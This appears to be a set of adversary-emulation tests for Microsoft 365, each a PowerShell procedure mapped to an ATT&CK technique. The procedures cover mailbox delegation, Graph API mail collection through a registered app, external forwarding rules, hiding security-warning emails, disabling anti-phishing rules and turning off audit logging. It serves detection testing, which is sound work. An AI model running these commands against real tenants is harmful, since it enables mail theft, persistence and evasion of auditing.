T1098.002
powershell
office-365
EXO - Full access mailbox permission granted to a user
Additional Email Delegate Permissions
Give a nominated user full mailbox delegation access to another user's mailbox. This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
Import-Module ExchangeOnlineManagement
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
Disconnect-ExchangeOnline -Confirm:$false
T1114.002
powershell
office-365
Office365 - Remote Mail Collected
Remote Email Collection
Create and register an Entra application that downloads emails from a tenant's Office 365 mailboxes using Microsoft Graph API app-only access. This can be used by an adversary to collect an organization's sensitive information.
$ss = ConvertTo-SecureString "#{password}" -AsPlainText -Force
$cred = New-Object PSCredential -ArgumentList '#{username}', $ss
$param = @{
Credential = $cred
Force = $true
}
$null = Connect-AzAccount @param
$token = (Get-AzAccessToken -ResourceTypeName MSGraph -ErrorAction Stop).token
$cert = New-SelfSignedCertificate -Subject "CN=PowerShell Application" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256
$reqResourceAccess = ( @{ "resourceAccess" = (@{"id"= "570282fd-fa5c-430d-a7fd-fc8dc98a9dca"; "type"= "Scope"}, @{ "id"= "7427e0e9-2fba-42fe-b0c0-848c9e6a8182"; "type"= "Scope"}, @{"id"= "37f7f235-527c-4136-accd-4a02d197296e"; "type"= "Scope"}, @{"id"= "14dad69e-099b-42c9-810b-d002981feec1"; "type"= "Scope"}, @{ "id"= "e1fe6dd8-ba31-4d61-89e7-88639da4683d"; "type"= "Scope"}, @{ "id"= "810c84a8-4a9e-49e6-bf7d-12d183f40d01"; "type"= "Role"}); "resourceAppId" = "00000003-0000-0000-c000-000000000000" })
connect-mggraph -AccessToken $token
$context = Get-MgContext
$users = get-MgUser
$app = New-MgApplication -DisplayName "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection" -RequiredResourceAccess $reqResourceAccess -Web @{ RedirectUris="http://localhost"; } -KeyCredentials @(@{ Type="AsymmetricX509Cert"; Usage="Verify"; Key=$cert.RawData })
New-MgServicePrincipal -AppId $app.appId -AdditionalProperties @{} | Out-Null
$resourceSPN = Get-MgServicePrincipal -Filter "AppId eq '$($app.AppId)'"
$graphApiApp = Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
$mailRole = $graphApiApp.AppRoles|Where-Object Value -Eq "Mail.Read"
New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $resourceSPN.Id -PrincipalId $resourceSPN.Id -ResourceId $graphApiApp.id -AppRoleId $mailRole.Id
$mailbox1 = "#{1st_target_mailbox}"
$mailbox2 = "#{2nd_target_mailbox}"
$mailbox3 = "#{3rd_target_mailbox}"
[System.Collections.ArrayList]$selectUsers = @()
foreach ($user in $users) {if (($user.Mail -eq $mailbox1) -Or ($user.Mail -eq $mailbox2) -Or ($user.Mail -eq $mailbox3)){$selectUsers.Add($user.id)}}
connect-mggraph -ClientId $app.AppId -TenantId $context.TenantId -CertificateName $cert.Subjectname.Name
foreach ($user in $selectUsers) { $url= "https://graph.microsoft.com/v1.0/users/$($user)/messages" ; Invoke-MgGraphRequest -Uri $url -Method GET -OutputType PSObject}
T1114.003
powershell
office-365
Office365 - Email Forwarding
Email Forwarding Rule
Creates a new inbox rule that forwards emails to an external user via the "ForwardTo" property of the New-InboxRule PowerShell cmdlet.
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
T1564.008
powershell
office-365
New-Inbox Rule to Hide E-mail in M365
Email Hiding Rules
This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body. Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
New-InboxRule -Mailbox "#{target_mailbox}" -Name "#{mail_rulename}" -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
T1685
powershell
office-365
office-365-Disable-AntiPhishRule
Disable or Modify Tools
Uses the Disable-AntiPhishRule cmdlet to disable anti-phishing rules in your Office 365 organization.
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
T1685.002
powershell
office-365
Office 365 - Exchange Audit Log Disabled
Disable or Modify Cloud Log
You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. Here, unified or admin audit logging is disabled via the Exchange PowerShell command line. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False
T1685.002
powershell
office-365
Office 365 - Set Audit Bypass For a Mailbox
Disable or Modify Cloud Log
Use the Exchange Management Shell to set a mailbox audit bypass association. This prevents any mailbox audit log entries from being generated for the target mailbox. https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true